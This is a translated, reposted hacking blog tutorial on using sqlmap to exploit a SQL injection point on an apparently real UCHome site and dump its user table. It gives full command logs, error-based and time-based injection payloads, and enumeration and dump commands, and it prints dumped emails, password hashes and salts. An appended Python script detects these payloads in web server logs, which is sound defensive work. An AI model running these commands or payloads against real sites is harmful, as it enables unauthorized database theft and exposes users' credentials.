PHP "pants" (database dumps): use sqlmap to pull her pants down (dump her database)~
2012-2-10 22:06 Friday
Lately all kinds of "pants-pulling" (扒裤, slang for dumping a site's database) are very popular. Normally you take over the site first and then dump with a script, but sometimes there is no choice and you have to dump straight from the injection point, and then you cannot do without the various injection tools.
Yang Fan wrote about how to dump with Pangolin (穿山甲); the sqlmap dumping write-up was originally by 07. I have used it to dump before, so here is a quick write-up, heh.
OK, let's demonstrate with a real injection URL (redacted).
Here is the command log:
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:06:11
[17:06:11] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:06:11] [INFO] testing connection to the target url
[17:06:13] [INFO] testing if the url is stable, wait a few seconds
[17:06:14] [INFO] url is stable
[17:06:14] [INFO] testing if GET parameter 'uid' is dynamic
[17:06:14] [INFO] confirming that GET parameter 'uid' is dynamic
[17:06:15] [WARNING] GET parameter 'uid' is not dynamic
[17:06:15] [INFO] heuristic test shows that GET parameter 'uid' might be injectable (possible DBMS: MySQL)
[17:06:15] [INFO] testing sql injection on GET parameter 'uid'
[17:06:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:06:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:06:18] [INFO] GET parameter 'uid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[17:06:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:06:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:07:18] [INFO] GET parameter 'uid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[17:07:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[17:07:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'uid' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:07:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:07:26] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
[*] shutting down at: 17:07:26
Note the red text: it shows that the uid parameter is injectable. Well, it turns out code blocks and colours cannot be combined here, so look at this line: GET parameter 'uid' is vulnerable.
Next, list all the databases:
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:08:57
[17:08:57] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:08:57] [INFO] resuming injection data from session file
[17:08:57] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:08:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:08:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:08:59] [INFO] fetching database names
[17:08:59] [INFO] the SQL query used returns 4 entries
[17:09:00] [INFO] retrieved: information_schema
[17:09:00] [INFO] retrieved: mysql
[17:09:00] [INFO] retrieved: test
[17:09:00] [INFO] retrieved: ucenter
available databases [4]:
[*] information_schema
[*] mysql
[*] test
[*] ucenter
[17:09:00] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
[*] shutting down at: 17:09:00
The red part is the list of databases (no colour here either, so it is the 'available databases [4]:' section). Then select the database and list its tables:
C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter --tables
I won't paste that result, there are too many tables. Go straight to listing the columns of the uc_members table (UCHome user data lives there, and that is what we want to dump, heh):
C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members --columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:11:44
[17:11:44] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:11:44] [INFO] resuming injection data from session file
[17:11:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:11:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:11:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:11:46] [INFO] fetching columns for table 'uc_members' on database 'ucenter'
[17:11:46] [INFO] the SQL query used returns 12 entries
[17:11:46] [INFO] retrieved: uid
[17:11:47] [INFO] retrieved: mediumint(8) unsigned
[17:11:47] [INFO] retrieved: username
[17:11:47] [INFO] retrieved: char(32)
[17:11:47] [INFO] retrieved: password
[17:11:47] [INFO] retrieved: char(32)
[17:11:47] [INFO] retrieved: email
[17:11:48] [INFO] retrieved: char(32)
[17:11:48] [INFO] retrieved: myid
[17:11:48] [INFO] retrieved: char(30)
[17:11:48] [INFO] retrieved: myidkey
[17:11:48] [INFO] retrieved: char(16)
[17:11:48] [INFO] retrieved: regip
[17:11:49] [INFO] retrieved: char(15)
[17:11:49] [INFO] retrieved: regdate
[17:11:49] [INFO] retrieved: int(10) unsigned
[17:11:49] [INFO] retrieved: lastloginip
[17:11:49] [INFO] retrieved: int(10)
[17:11:49] [INFO] retrieved: lastlogintime
[17:11:50] [INFO] retrieved: int(10) unsigned
[17:11:50] [INFO] retrieved: salt
[17:11:50] [INFO] retrieved: char(6)
[17:11:50] [INFO] retrieved: secques
[17:11:50] [INFO] retrieved: char(8)
Database: ucenter
Table: uc_members
[12 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| email | char(32) |
| lastloginip | int(10) |
| lastlogintime | int(10) unsigned |
| myid | char(30) |
| myidkey | char(16) |
| password | char(32) |
| regdate | int(10) unsigned |
| regip | char(15) |
| salt | char(6) |
| secques | char(8) |
| uid | mediumint(8) unsigned |
| username | char(32) |
+---------------+-----------------------+
[17:11:51] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
[*] shutting down at: 17:11:51
No need to say more; start dumping. We only need some of the columns. Use --threads to raise the thread count, and --start and --stop to set the range of records to dump. Let's pull a few records and see:
C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members -C uid,username,password,salt,email --dump --threads=10 --start=1 --stop=50
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:14:22
[17:14:22] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:14:22] [INFO] resuming injection data from session file
[17:14:22] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:14:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:14:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:14:23] [INFO] fetching columns 'uid, username, password, salt, email' entries for table 'uc_members' on database 'ucenter'
[17:14:24] [INFO] retrieved: 2
[17:14:24] [INFO] retrieved: xx1@163.com
[17:14:24] [INFO] retrieved: 0a9c9d7451d0e78938747083add7fa5a
[17:14:24] [INFO] retrieved: 001c6f
[17:14:24] [INFO] retrieved: asdf@yeah.net
[17:14:25] [INFO] retrieved: 3
[17:14:25] [INFO] retrieved: xx086@163.com
[17:14:25] [INFO] retrieved: 02b3f6122a2882ffdd9ee9f12be60a6e
[17:14:25] [INFO] retrieved: 44d1f1
[17:14:25] [INFO] retrieved: x520@gmail.com
[17:14:25] [INFO] retrieved: 5
[17:14:25] [INFO] retrieved: xlyb@163.com
[17:14:26] [INFO] retrieved: 97226e4861d8e3251af4256781b78868
[17:14:26] [INFO] retrieved: 297944
[17:14:26] [INFO] retrieved: txen@vip.qq.com
[17:14:26] [INFO] retrieved: 73
[17:14:27] [INFO] retrieved: 0x40@qq.com
[17:14:27] [INFO] retrieved: 7e55a749a63c427a767cb1d9aa826f3b
[17:14:27] [INFO] retrieved: d84a57
[17:14:27] [INFO] retrieved: yx@126.com
[17:14:27] [INFO] retrieved: 74
[17:14:28] [INFO] retrieved: x540@qq.com
[17:14:28] [INFO] retrieved: 10bb282c88331c6e95d14700ba9390f0
[17:14:28] [INFO] retrieved: 589369
[17:14:28] [INFO] retrieved: hx@xxoo.org
[17:14:28] [INFO] retrieved: 75
[17:14:28] [INFO] retrieved: 0x840@qq.com
[17:14:29] [INFO] retrieved: 313bfb31b5cd6e58797291665a7b6ed1
[17:14:29] [INFO] retrieved: 229620
[17:14:29] [INFO] retrieved: fexg@xxoo.org
[17:14:29] [INFO] retrieved: 76
[17:14:29] [INFO] retrieved: 0.4.658940@qq.com
[17:14:29] [INFO] retrieved: 1846282a634da3c90af4e0250931b8c2
[17:14:30] [INFO] retrieved: da5025
[17:14:30] [INFO] retrieved: sxg@xxoo.org
[17:14:30] [INFO] retrieved: 77
[17:14:30] [INFO] retrieved: 0x6540@qq.com
[17:14:30] [INFO] retrieved: 8ff58083e52ad0b45c29daa6e6a92b82
[17:14:30] [INFO] retrieved: 024f42
[17:14:31] [INFO] retrieved: chfn@xxoo.org
[17:14:31] [INFO] retrieved: 78
[17:14:31] [INFO] retrieved: f4540@qq.com
[17:14:31] [INFO] retrieved: 46bbf0639b4195c4a5e0520f3d021315
[17:14:31] [INFO] retrieved: fed606
[17:14:31] [INFO] retrieved: rafg2@gmail.com
[17:14:32] [INFO] retrieved: 79
[17:14:32] [INFO] retrieved: 0.4.687540@qq.com
[17:14:32] [INFO] retrieved: 3de40cc0ba602a744eac8ec5a0da20d9
[17:14:32] [INFO] retrieved: ef16e8
[17:14:32] [INFO] retrieved: 123@123.com
[17:14:32] [INFO] retrieved: 80
[17:14:33] [INFO] retrieved: 0.474.6540@qq.com
[17:14:33] [INFO] retrieved: 2b70f5a5ada849ba5ef6fcdb8e04de82
[17:14:33] [INFO] retrieved: f1750c
[17:14:33] [INFO] retrieved: editfrc@xxoo.org
[17:14:33] [INFO] retrieved: 81
[17:14:33] [INFO] retrieved: f8dna@gmail.com
[17:14:34] [INFO] retrieved: 29ca2bc5046ebd4e84ae42e39ac1ed94
[17:14:34] [INFO] retrieved: 93d41a
[17:14:34] [INFO] retrieved: fanfg@xxoo.org
[17:14:34] [INFO] retrieved: 82
[17:14:34] [WARNING] user aborted during enumeration. sqlmap will display partial output
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n
Database: ucenter
Table: uc_members
[12 entries]
+----------------------------+----------------------------------+--------+-----+--------------------------+
| email | password | salt | uid | username |
+----------------------------+----------------------------------+--------+-----+--------------------------+
| xxoo@yeah.net | 0a9c9d7451d0e78938747083add7fa5a | 001c6f | 2 | 0-9xx@163.com |
| xxoo@gmail.com | 02b3f6122a2882ffdd9ee9f12be60a6e | 44d1f1 | 3 | 0.1086@163.com |
| xxn@vip.qq.com | 97226e4861d8e3251af4256781b78868 | 297944 | 5 | 0.1lx@163.com |
| xxvv@126.com | 7e55a749a63c427a767cb1d9aa826f3b | d84a57 | 73 | 0.x0@qq.com |
| asdfasd@xxoo.org | 10bb282c88331c6e95d14700ba9390f0 | 589369 | 74 | 0.x546540@qq.com |
|xxg@xxoo.org | 313bfb31b5cd6e58797291665a7b6ed1 | 229620 | 75 | 0.4.6xxx840@qq.com |
| shi_ying@xxoo.org | 1846282a634da3c90af4e0250931b8c2 | da5025 | 76 | 0.4xx940@qq.com |
| chen_shan@xxoo.org | 8ff58083e52ad0b45c29daa6e6a92b82 | 024f42 | 77 | 0xx6540@qq.com |
| rafikixx@gmail.com | 46bbf0639b4195c4a5e0520f3d021315 | fed606 | 78 | 0x4540@qq.com |
| 123@123.com | 3de40cc0ba602a744eac8ec5a0da20d9 | ef16e8 | 79 | x40@qq.com |
| editorc@xxoo.org | 2b70f5a5ada849ba5ef6fcdb8e04de82 | f1750c | 80 | xxx@qq.com |
| fangxg@xxoo.org | 29ca2bc5046ebd4e84ae42e39ac1ed94 | 93d41a | 81 | 0xxa@gmail.com |
+----------------------------+----------------------------------+--------+-----+--------------------------+
[17:14:39] [INFO] Table 'ucenter.uc_members' dumped to CSV file 'C:\sqlmap\output\user.xxoo.org\dump\ucenter\uc_members.csv'
[17:14:39] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
See, it is all in one CSV file. A CSV is just a file of comma-separated records; Excel, Access, MySQL, whatever, can all import it. Better than Pangolin's HTML, heh. Here is a screenshot:
That's all for now. sqlmap is really powerful, and cross-platform too, dear.
Reposted from f4ck
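Seen from the server side, every step of the session above (the discovery probes, the database and column enumeration, and the row-by-row dump) leaves a recognisable trail in the web server access log: the error-based payload with FLOOR(RAND(0)*2) and GROUP BY, the time-based AND SLEEP(5) probe, the UNION tests, references to information_schema, and sqlmap's default User-Agent string. The script below is an added example written for this page, not code from the original post or from sqlmap; it scans Apache combined-format log lines for those indicators and counts flagged requests per client, since a column dump like the one above shows up as a burst of such requests from one address against one parameter. The log lines, IP addresses and timestamps are constructed for the example; the payload shapes mirror the ones sqlmap printed above.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access log (Apache combined format). Hosts, IPs and
# timestamps are made up; the request payloads follow the shapes shown in
# the sqlmap session on this page.
SAMPLE_LOG = r"""
10.0.0.5 - - [10/Feb/2012:17:06:11 +0800] "GET /ucHome/space.php?uid=222 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Feb/2012:17:06:15 +0800] "GET /ucHome/space.php?uid=222%20AND%20%28SELECT%208621%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C111%2C115%2C109%2C58%29%2C%28SELECT%20%28CASE%20WHEN%20%288621%3D8621%29%20THEN%201%20ELSE%200%20END%29%29%2CCHAR%2858%2C119%2C122%2C107%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 1203 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
10.0.0.5 - - [10/Feb/2012:17:06:18 +0800] "GET /ucHome/space.php?uid=222%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
192.168.1.9 - - [10/Feb/2012:17:07:00 +0800] "GET /ucHome/space.php?uid=15 HTTP/1.1" 200 4980 "-" "Mozilla/5.0 (Windows NT 6.1)"
10.0.0.5 - - [10/Feb/2012:17:07:20 +0800] "GET /ucHome/space.php?uid=222%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
"""

# Apache "combined" log format: ip ident user [time] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Indicators are matched against the URL-decoded request, so %20/%28
# encoding does not hide a payload from the scan.
INDICATORS = {
    "time-based (SLEEP/BENCHMARK)": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    "error-based (FLOOR(RAND(0)*2) ... GROUP BY)": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "union-based": re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I),
    "schema enumeration (information_schema)": re.compile(r"\binformation_schema\.", re.I),
}


def classify_request(path, user_agent):
    """Return the names of all injection indicators present in one request."""
    decoded = unquote_plus(path)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if user_agent.lower().startswith("sqlmap"):
        hits.append("sqlmap default User-Agent")
    return hits


def analyze_log(text):
    """Parse combined-format lines and return one finding per suspicious request."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than guess
        hits = classify_request(m["path"], m["ua"])
        if hits:
            findings.append({
                "ip": m["ip"], "time": m["time"], "status": m["status"],
                "path": unquote_plus(m["path"]), "indicators": hits,
            })
    return findings


def requests_per_client(findings):
    """Count flagged requests per source address. A row-by-row dump such as
    the --dump run above produces hundreds of these from a single client."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], f["status"], ", ".join(f["indicators"]))
    print(requests_per_client(found))
```

The User-Agent check is the weakest of the indicators, since sqlmap can be told to send any string, which is why the payload patterns are matched on the decoded query and the per-client count is kept separately: a long run of flagged requests from one address against the same parameter is the signature of an enumeration and dump, whatever the client calls itself.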